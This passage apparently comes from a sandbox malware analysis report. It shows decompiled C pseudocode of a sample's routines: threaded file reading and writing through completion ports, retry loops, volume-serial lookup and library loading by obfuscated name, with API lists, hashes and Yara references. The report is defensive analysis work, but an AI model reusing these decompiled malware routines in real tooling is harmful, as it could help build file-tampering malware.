              • Part of subcall function 009B576A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000022,?,009B5007,00000000,00000001), ref: 009B578D
            • wsprintfW.USER32 ref: 009B5072
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Heap$CreateInformationProcessVolumewsprintf
            • String ID:
            • API String ID: 2230357944-0
            • Opcode ID: 8a7e907d418b35188f6fb1f3e1af7546f36a37207d328f44dc8d438628d9c8bc
            • Instruction ID: 5d89b889a04b4a1fde876043de00cebc3dae97f17b6aec88a252bd9ded7e9529
            • Opcode Fuzzy Hash: 8a7e907d418b35188f6fb1f3e1af7546f36a37207d328f44dc8d438628d9c8bc
            • Instruction Fuzzy Hash: DC016D72A40608BAE711B7E48E06FEFB76C9F84B21F040156BB00E6182EA64961047A5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B3722, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
            Download Yara Rule
            C-Code - Quality: 89%
            			E009B3722(intOrPtr _a4, intOrPtr _a8) {
				long _t9;
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr _t18;
				void* _t19;
				void* _t20;
				intOrPtr _t22;

				_t18 = _a4;
				 *((intOrPtr*)(_t18 + 0x150)) = 3;
				 *((intOrPtr*)(_t18 + 0x154)) = _a8;
				if( *0x9c22d8 == 1) {
					_t15 =  *((intOrPtr*)(_t18 + 0x24));
					_t11 =  *((intOrPtr*)(_t18 + 0x20));
					_t22 = _t15;
					if(_t22 >= 0 && (_t22 > 0 || _t11 > 0x100000)) {
						asm("sbb ecx, 0x0");
						_push(_t15);
						E009B7636(_t18, _t11 - 0x100000);
						_t19 = _t19 + 0xc;
					}
				}
				_t17 = _t18 + 0x28;
				_t9 = E009B7650(_t18, _t18 + 0x28, 0xe8); // executed
				_t20 = _t19 + 0xc;
				while(_t9 == 0) {
					_t9 = RtlGetLastWin32Error();
					if(_t9 == 0x3e5) {
						break;
					}
					E009B575C(_t9, 0x64);
					_t9 = E009B7650(_t18, _t17, 0xe8);
					_t20 = _t20 + 0x10;
				}
				return _t9;
			}










            0x009b372a
            0x009b372e
            0x009b3738
            0x009b3745
            0x009b3747
            0x009b374a
            0x009b374d
            0x009b374f
            0x009b375e
            0x009b3761
            0x009b3764
            0x009b3769
            0x009b3769
            0x009b374f
            0x009b3771
            0x009b3777
            0x009b377c
            0x009b379f
            0x009b3781
            0x009b378b
            0x00000000
            0x00000000
            0x009b378f
            0x009b3797
            0x009b379c
            0x009b379c
            0x009b37a7

            APIs
            • RtlGetLastWin32Error.NTDLL ref: 009B3781
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLastWin32
            • String ID:
            • API String ID: 3973360955-0
            • Opcode ID: 229593a323d3f607464ee939bad0082ce7b785b7330c1e10f83c000fe8d54daa
            • Instruction ID: 23359b76a3497c77e590eb6765fa21f3140026baa79f443bb1bb0031bf3211bc
            • Opcode Fuzzy Hash: 229593a323d3f607464ee939bad0082ce7b785b7330c1e10f83c000fe8d54daa
            • Instruction Fuzzy Hash: EE0120F5900A049BE724AA6CDFCDFEB739CDBC4734F008628F50586241DA70EE014362
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B36AB, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
            Download Yara Rule
            C-Code - Quality: 86%
            			E009B36AB(void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				long _t17;
				void* _t19;
				intOrPtr _t21;
				void* _t22;
				void* _t23;

				_t19 = __edx;
				_t21 = _a4;
				E009B8241(_t21 + 0x110, _t21 + 0x15c, _t21 + 0x15c, _a8);
				 *((intOrPtr*)(_t21 + 0x154)) = _a12;
				 *((intOrPtr*)(_t21 + 0x150)) = 2;
				asm("cdq");
				_push(_t19);
				E009B7636(_t21,  ~_a8);
				_t17 = E009B7650(_t21, _t20, _a8); // executed
				_t23 = _t22 + 0x28;
				while(_t17 == 0) {
					_t17 = RtlGetLastWin32Error();
					if(_t17 != 0x3e5) {
						E009B575C(_t17, 0x64);
						_t17 = E009B7650(_t21, _t20, _a8);
						_t23 = _t23 + 0x10;
						continue;
					}
					break;
				}
				return _t17;
			}








            0x009b36ab
            0x009b36af
            0x009b36c5
            0x009b36cd
            0x009b36d8
            0x009b36e2
            0x009b36e3
            0x009b36e6
            0x009b36f0
            0x009b36f5
            0x009b371a
            0x009b36fa
            0x009b3704
            0x009b3708
            0x009b3712
            0x009b3717
            0x00000000
            0x009b3717
            0x00000000
            0x009b3704
            0x009b3721

            APIs
              • Part of subcall function 009B7650: WriteFile.KERNELBASE(?,?,009B3655,00000000,?,?,009B36F5,?,?,?,?,?), ref: 009B7662
            • RtlGetLastWin32Error.NTDLL ref: 009B36FA
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: ErrorFileLastWin32Write
            • String ID:
            • API String ID: 2457671358-0
            • Opcode ID: 13aeb1a6d35ee968a50246aa07041ffbced5da158a67f1b54762a0a873672283
            • Instruction ID: 6716994a74e5d9c2bb60b1ca829ac3665e0491302919e4d8fe50af249fdbecff
            • Opcode Fuzzy Hash: 13aeb1a6d35ee968a50246aa07041ffbced5da158a67f1b54762a0a873672283
            • Instruction Fuzzy Hash: 27F0CDB6500E08FBCB11AFA9CD4AFDF77ADDFC9324F004418F91986201D670960087B1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B74DF, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B74DF(void* __eflags, intOrPtr* _a4, intOrPtr _a8, long _a12, _Unknown_base(*)()* _a16) {
				intOrPtr _t7;
				void* _t8;
				void* _t9;
				intOrPtr* _t21;

				_t7 = E009B490B(_a8); // executed
				_t21 = _a4;
				 *_t21 = _t7;
				if(_t7 != 0) {
					_t8 = CreateIoCompletionPort(0xffffffff, 0, 0, _a12);
					 *(_t21 + 4) = _t8;
					if(_t8 != 0) {
						_t9 = E009B748F(_t21, _a16); // executed
						if(_t9 != 0) {
							return 1;
						}
						E009B4928( *_t21);
						E009B4BEE( *(_t21 + 4));
						L4:
						goto L1;
					}
					E009B4928( *_t21);
					goto L4;
				}
				L1:
				return 0;
			}







            0x009b74e6
            0x009b74eb
            0x009b74ef
            0x009b74f3
            0x009b7502
            0x009b7508
            0x009b750d
            0x009b751d
            0x009b7526
            0x00000000
            0x009b753c
            0x009b752a
            0x009b7532
            0x009b7516
            0x00000000
            0x009b7516
            0x009b7511
            0x00000000
            0x009b7511
            0x009b74f5
            0x00000000

            APIs
              • Part of subcall function 009B490B: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,009B74EB,?,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4920
            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,009B3561,00000000,?,009B338D,?,00000000,00000000,009B3561,?,00000000,00000000), ref: 009B7502
              • Part of subcall function 009B748F: CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 009B74B3
              • Part of subcall function 009B4928: HeapDestroy.KERNELBASE(00000000,?,009B752F,00000000,?,009B338D,?,00000000,00000000,009B3561,?,00000000,00000000), ref: 009B492E
              • Part of subcall function 009B4BEE: FindCloseChangeNotification.KERNELBASE(00000000,?,009B74C6,00000000,?,009B7522,00000000,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4BFA
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Create$Heap$ChangeCloseCompletionDestroyFindNotificationPortThread
            • String ID:
            • API String ID: 1739922738-0
            • Opcode ID: 5bda4891e0ba8f98cc1b74d096a6d667fa6a7933792bd61dd0df9eed6c30bab3
            • Instruction ID: 79aeb080ddbc09108d33567936f72830d600d405c59b9b991226b033c992651c
            • Opcode Fuzzy Hash: 5bda4891e0ba8f98cc1b74d096a6d667fa6a7933792bd61dd0df9eed6c30bab3
            • Instruction Fuzzy Hash: 08F0F63100C207AADF212FA0AE01BD6BB9AEF80772F204E28F456D50A1EB21D8106640
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B7430, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B7430(intOrPtr* _a4, intOrPtr* _a8) {
				void* _t13;
				long _t18;
				intOrPtr* _t19;

				 *_a8 = 1;
				_t18 = 0; // executed
				_t9 = E009B53F1(); // executed
				_t19 = _a4;
				if((_t9 & 0x7fffffff) > 0) {
					do {
						PostQueuedCompletionStatus( *(_t19 + 4), 0, 0, 0);
						_t18 = _t18 + 1;
						_t13 = E009B53F1();
						_t9 = _t13 + _t13;
					} while (_t18 < _t13 + _t13);
					L4:
					while( *((intOrPtr*)(_t19 + 8)) != 0) {
						_t9 = E009B575C(_t9, 0x64);
					}
					E009B4928( *_t19); // executed
					return E009B4BEE( *(_t19 + 4));
				}
				goto L4;
			}






            0x009b743b
            0x009b7441
            0x009b7443
            0x009b7448
            0x009b7450
            0x009b7452
            0x009b7458
            0x009b745e
            0x009b745f
            0x009b7464
            0x009b7466
            0x00000000
            0x009b7474
            0x009b746e
            0x009b7473
            0x009b747b
            0x009b748e
            0x009b748e
            0x00000000

            APIs
              • Part of subcall function 009B53F1: GetSystemInfo.KERNELBASE(?,?,009B338D,?,00000000,00000000,009B3561,?,00000000,00000000), ref: 009B53FB
            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,00000001,00000000,00000000,?,009B3553,?,009C1D84,?,?,00000000,00000000), ref: 009B7458
              • Part of subcall function 009B575C: Sleep.KERNEL32(?,?,009B7473,00000064,00000001,00000000,00000000,?,009B3553,?,009C1D84,?,?,00000000,00000000), ref: 009B5762
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CompletionInfoPostQueuedSleepStatusSystem
            • String ID:
            • API String ID: 883128096-0
            • Opcode ID: 69cedf338f8397d3502e925561092569730ed3d564a68615f4cb5cec9fe6061e
            • Instruction ID: a5004ff99f9f3a7bccebee7b54386947eaa637ae81a02face96b36b665f9b061
            • Opcode Fuzzy Hash: 69cedf338f8397d3502e925561092569730ed3d564a68615f4cb5cec9fe6061e
            • Instruction Fuzzy Hash: 48F0BB72108304AFD7003F65EDC1B9BBBDFDBC07B57114529F559861A2DA31EC405610
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B748F, Relevance: 1.5, APIs: 1, Instructions: 39threadCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B748F(void* _a4, _Unknown_base(*)()* _a8) {
				signed int _t8;
				void* _t11;
				void* _t14;
				struct _SECURITY_ATTRIBUTES* _t18;
				void* _t19;

				_t19 = _a4;
				_t18 = 0;
				 *((intOrPtr*)(_t19 + 8)) = 0;
				_t8 = E009B53F1(); // executed
				if((_t8 & 0x7fffffff) <= 0) {
					L3:
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t11 = CreateThread(0, 0, _a8, _t19, 0, 0); // executed
					if(_t11 == 0) {
						break;
					}
					 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) + 1;
					E009B4BEE(_t11); // executed
					_t18 =  &(_t18->nLength); // executed
					_t14 = E009B53F1(); // executed
					if(_t18 < _t14 + _t14) {
						continue;
					}
					goto L3;
				}
				return 0;
			}








            0x009b7494
            0x009b749a
            0x009b749c
            0x009b749f
            0x009b74a9
            0x009b74d3
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009b74ab
            0x009b74ab
            0x009b74b3
            0x009b74bb
            0x00000000
            0x00000000
            0x009b74bd
            0x009b74c1
            0x009b74c7
            0x009b74c8
            0x009b74d1
            0x00000000
            0x00000000
            0x00000000
            0x009b74d1
            0x00000000

            APIs
              • Part of subcall function 009B53F1: GetSystemInfo.KERNELBASE(?,?,009B338D,?,00000000,00000000,009B3561,?,00000000,00000000), ref: 009B53FB
            • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 009B74B3
              • Part of subcall function 009B4BEE: FindCloseChangeNotification.KERNELBASE(00000000,?,009B74C6,00000000,?,009B7522,00000000,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4BFA
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: ChangeCloseCreateFindInfoNotificationSystemThread
            • String ID:
            • API String ID: 908986755-0
            • Opcode ID: bc5e02d1e18566be515da3f1130aa107284bd13c07b9ad2e5f2a06bcd3e29a8b
            • Instruction ID: 0009a36b4a478bc7068426f906d82011c552f741468ab1d31223f8ef3227a71f
            • Opcode Fuzzy Hash: bc5e02d1e18566be515da3f1130aa107284bd13c07b9ad2e5f2a06bcd3e29a8b
            • Instruction Fuzzy Hash: 27F0A7726087187E97002BB6ED80AABBBDEDAC53F93104935B55AC2161D570DC419560
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B3236, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B3236(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t10;
				long _t11;
				intOrPtr _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t16 = _t17 + 0x15c;
				 *((intOrPtr*)(_t17 + 0x150)) = 1;
				 *((intOrPtr*)(_t17 + 0x154)) = _a12;
				_t10 = E009B761C(_t17, _t17 + 0x15c,  *((intOrPtr*)(_t17 + 0x158))); // executed
				_t19 = _t18 + 0xc;
				while(_t10 == 0) {
					_t11 = RtlGetLastWin32Error();
					if(_t11 != 0x3e5) {
						if(_t11 == 0x26) {
							return E009B2E8C(_a4, _t17);
						}
						E009B575C(_t11, 0x64);
						_t10 = E009B761C(_t17, _t16,  *((intOrPtr*)(_t17 + 0x158)));
						_t19 = _t19 + 0x10;
						continue;
					}
					return _t11;
				}
				return _t10;
			}








            0x009b323d
            0x009b3247
            0x009b324d
            0x009b3259
            0x009b325f
            0x009b3264
            0x009b3291
            0x009b3269
            0x009b3273
            0x009b3278
            0x00000000
            0x009b32a1
            0x009b327c
            0x009b3289
            0x009b328e
            0x00000000
            0x009b328e
            0x009b32a5
            0x009b32a5
            0x00000000

            APIs
              • Part of subcall function 009B761C: ReadFile.KERNELBASE(?,?,009B3660,00000000,?,?,009B3264,?,?), ref: 009B762E
            • RtlGetLastWin32Error.NTDLL ref: 009B3269
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: ErrorFileLastReadWin32
            • String ID:
            • API String ID: 3522703849-0
            • Opcode ID: bb8bcbb3200b94efafe530ef17ff692b3b4020df5f70da5ef7586d84d7e8f414
            • Instruction ID: 293b66d2484562cef8b82d539511f359e2cff34ce0365dafce02a137b3b088f7
            • Opcode Fuzzy Hash: bb8bcbb3200b94efafe530ef17ff692b3b4020df5f70da5ef7586d84d7e8f414
            • Instruction Fuzzy Hash: ACF02B31404B44EBCB206BAADE4EFDF7BACDFC6330F00492AF52856241DA7166548792
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B75BB, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B75BB(intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28) {
				void* _t17;
				intOrPtr _t18;
				intOrPtr _t27;

				_t27 = _a4;
				 *((intOrPtr*)(_t27 + 0xc)) = 0;
				 *((intOrPtr*)(_t27 + 8)) = 0;
				_t17 = CreateFileW(_a8, _a20, _a24, 0, _a28, 0x48000000, 0); // executed
				 *(_t27 + 0x14) = _t17;
				if(_t17 != 0xffffffff) {
					_t18 = E009B6253(_a8);
					 *((intOrPtr*)(_t27 + 0x18)) = _t18;
					if(_t18 != 0) {
						 *((intOrPtr*)(_t27 + 0x20)) = _a12;
						 *((intOrPtr*)(_t27 + 0x24)) = _a16;
						return 1;
					}
					E009B4BEE( *(_t27 + 0x14));
				}
				return 0;
			}






            0x009b75bf
            0x009b75cd
            0x009b75d4
            0x009b75dd
            0x009b75e3
            0x009b75e9
            0x009b75f2
            0x009b75f7
            0x009b75fd
            0x009b760d
            0x009b7613
            0x00000000
            0x009b7618
            0x009b7602
            0x009b7607
            0x00000000

            APIs
            • CreateFileW.KERNELBASE(C0000000,?,00000000,00000000,009B3060,48000000,00000000,00000000,?,009B3060,00000000,?,?,00000000,C0000000,00000000), ref: 009B75DD
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 9006763fe67aabcf5423277f855b413a25f2c3fa08042222a028ed665ee140ba
            • Instruction ID: b8984edfde7001a57c3f31246421e4d3edfd03d3bc399994e3a2aebaf8f5aaf3
            • Opcode Fuzzy Hash: 9006763fe67aabcf5423277f855b413a25f2c3fa08042222a028ed665ee140ba
            • Instruction Fuzzy Hash: 6D013175418605EFDB209F75DD409AABBE9FF48330B108A29FC56C2650E731E8109B54
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B576A, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
            Download Yara Rule
            C-Code - Quality: 87%
            			E009B576A() {
				long _v8;
				signed int _t9;
				WCHAR* _t16;

				_t16 = E009B5C24();
				_t7 = 0;
				if(_t16 != 0) {
					_t16[3] = 0;
					_t9 = GetVolumeInformationW(_t16, 0, 0,  &_v8, 0, 0, 0, 0); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t9;
					E009B4999(_t16);
					_t7 = _v8;
				}
				return _t7;
			}






            0x009b5774
            0x009b5776
            0x009b577a
            0x009b577e
            0x009b578d
            0x009b5796
            0x009b5798
            0x009b579b
            0x009b57a0
            0x009b57a3
            0x009b57a8

            APIs
              • Part of subcall function 009B5C24: GetWindowsDirectoryW.KERNEL32(00000000,00000000,00000000,009B5774,00000000,00000022,?,009B5007,00000000,00000001), ref: 009B5C29
            • GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000022,?,009B5007,00000000,00000001), ref: 009B578D
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: DirectoryInformationVolumeWindows
            • String ID:
            • API String ID: 3487004747-0
            • Opcode ID: d3f29e18555a47df590614db0c72e429346cab0059cb1c4e70c5a78d8cdcf56e
            • Instruction ID: 2a9c6400cb0f1eee0ff3c09c5e9c2534c75152cc98f7a76d8c8fe4612a128823
            • Opcode Fuzzy Hash: d3f29e18555a47df590614db0c72e429346cab0059cb1c4e70c5a78d8cdcf56e
            • Instruction Fuzzy Hash: 12E06DB2925618BF6B18E7A4ED0BCFBB3ACDE01221310465EF801C6100FA61AE0052A8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B6F6F, Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B6F6F() {
				char _v5;
				char _v12;
				struct HINSTANCE__* _t8;

				E009B5E33(0x9c1338, 0x367, 0xe, 7,  &_v12);
				_v5 = 0;
				E009B70D1(0x69335005);
				_t8 = LoadLibraryA( &_v12); // executed
				return _t8;
			}






            0x009b6f86
            0x009b6f8e
            0x009b6f9b
            0x009b6fa1
            0x009b6fa6

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B6FA1
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 0dcbea5234a1d9a9a28e993079d71ecb6ad4a159c59055f4b11f3beff32faa02
            • Instruction ID: ecf6db5562a4868cf71a561a1622939e91284bff129e66fca12606143a2e17a7
            • Opcode Fuzzy Hash: 0dcbea5234a1d9a9a28e993079d71ecb6ad4a159c59055f4b11f3beff32faa02
            • Instruction Fuzzy Hash: 1DD0129298838C7AE611E2D4DC03FED775C8785714F81019ABA48A6581E9A6D65442B2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B72A6, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B72A6() {
				char _v5;
				char _v16;
				struct HINSTANCE__* _t8;

				E009B5E33(0x9c1338, 0x5b4, 6, 0xb,  &_v16);
				_v5 = 0;
				E009B70D1(0x69335005);
				_t8 = LoadLibraryA( &_v16); // executed
				return _t8;
			}






            0x009b72be
            0x009b72c6
            0x009b72d3
            0x009b72d9
            0x009b72de

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B72D9
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 7bc053cebddb7cdc1111ce646f85db147ce01b2c906aa1520f4f5a84d4afae88
            • Instruction ID: a9ba0c40cde907b715d6257be20d957b4cec6e88416052e57a61e47081e25f4a
            • Opcode Fuzzy Hash: 7bc053cebddb7cdc1111ce646f85db147ce01b2c906aa1520f4f5a84d4afae88
            • Instruction Fuzzy Hash: 44D05B61D8434C75D621F6E45C03F9E735C8785714F8101D5BE18D61C2EAA2971587E3
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B6EF1, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B6EF1() {
				char _v5;
				char _v16;
				struct HINSTANCE__* _t8;

				E009B5E33(0x9c1338, 0x71a, 0xd, 0xb,  &_v16);
				_v5 = 0;
				E009B70D1(0x69335005);
				_t8 = LoadLibraryA( &_v16); // executed
				return _t8;
			}






            0x009b6f09
            0x009b6f11
            0x009b6f1e
            0x009b6f24
            0x009b6f29

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B6F24
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
